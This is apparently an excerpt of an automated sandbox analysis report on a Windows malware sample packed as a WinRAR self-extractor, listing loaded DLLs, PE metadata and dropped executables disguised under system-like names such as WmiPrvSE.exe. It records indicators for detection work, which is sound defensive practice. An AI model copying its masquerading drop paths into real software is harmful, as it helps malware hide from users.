                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: version.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDirectory created: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDirectory created: C:\Program Files\Microsoft Office 15\6bc8f6e50ab287Jump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDirectory created: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exeJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeDirectory created: C:\Program Files\Windows Multimedia Platform\24dbde2999530eJump to behavior
                                    Source: cuAvoExY41.exeStatic file information: File size 2278706 > 1048576
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: cuAvoExY41.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: cuAvoExY41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: cuAvoExY41.exe
                                    Source: cuAvoExY41.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: cuAvoExY41.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: cuAvoExY41.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: cuAvoExY41.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: cuAvoExY41.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeFile created: C:\surrogateFontdhcpCommon\__tmp_rar_sfx_access_check_5101671Jump to behavior
                                    Source: cuAvoExY41.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCF640 push ecx; ret 0_2_00FCF653
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCEB78 push eax; ret 0_2_00FCEB96
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeCode function: 4_2_00007FFD9B7E00AD pushad ; iretd 4_2_00007FFD9B7E00C1
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeCode function: 4_2_00007FFD9BBD5528 pushad ; retf 4_2_00007FFD9BBD5529
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeCode function: 9_2_00007FFD9BE176FC push E95F0CD1h; ret 9_2_00007FFD9BE17709
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeCode function: 9_2_00007FFD9BE15528 pushad ; retf 9_2_00007FFD9BE15529
                                    Source: ChainPortServerBrowsermonitor.exe.0.drStatic PE information: section name: .text entropy: 7.55370402414694
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe.4.drStatic PE information: section name: .text entropy: 7.55370402414694
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe0.4.drStatic PE information: section name: .text entropy: 7.55370402414694
                                    Source: WmiPrvSE.exe.4.drStatic PE information: section name: .text entropy: 7.55370402414694
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe1.4.drStatic PE information: section name: .text entropy: 7.55370402414694
                                    Source: upfc.exe.4.drStatic PE information: section name: .text entropy: 7.55370402414694
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\Public\Libraries\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\UxpXqoOQ.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\CUGzHwzy.logJump to dropped file
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeFile created: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\ddDNduPc.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\ffpwzeUX.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\surrogateFontdhcpCommon\upfc.exeJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\dVTvzLpX.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\oOILjGZF.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\EQOQCKPT.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\vnZStDyM.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\mKRcJKjf.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\VDAxqXDQ.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exeJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\ddDNduPc.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\EQOQCKPT.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\oOILjGZF.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\ffpwzeUX.logJump to dropped file
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\dVTvzLpX.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\CUGzHwzy.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\vnZStDyM.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\mKRcJKjf.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\VDAxqXDQ.logJump to dropped file
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeFile created: C:\Users\user\Desktop\UxpXqoOQ.logJump to dropped file
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
